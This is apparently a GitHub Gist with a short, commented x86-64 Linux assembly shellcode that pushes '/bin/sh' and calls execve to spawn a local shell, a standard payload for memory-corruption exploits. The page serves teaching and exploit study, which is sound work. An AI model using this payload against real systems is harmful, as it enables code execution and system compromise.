Last active
December 19, 2021 14:46
-
-
Save alloncm/feeea0da2b54e1feab36f6a920847cd5 to your computer and use it in GitHub Desktop.
x64_86 Linux - Spawn a shell shellcode
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
mov rax, 0x0068732f6e69622f ; "/bin/sh" in ascii (including a null terminator), | |
; since we are on little endian the integer bytes are flipped so when loaded to memory | |
; it will load correct | |
push rax ; pushing to memory so it will accessible by pointer | |
mov rax, 0x3b ; execve syscall id | |
mov rdi, rsp ; first parameter a pointer to the program to execute - pointer to the newly pushed string | |
xor rsi, rsi ; the second parameter a pointer to the argv of the program - NULL | |
xor rdx, rdx ; the third parameter a pointer to the env variables of the program - NULL | |
syscall ; shell! |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86_64-64_bit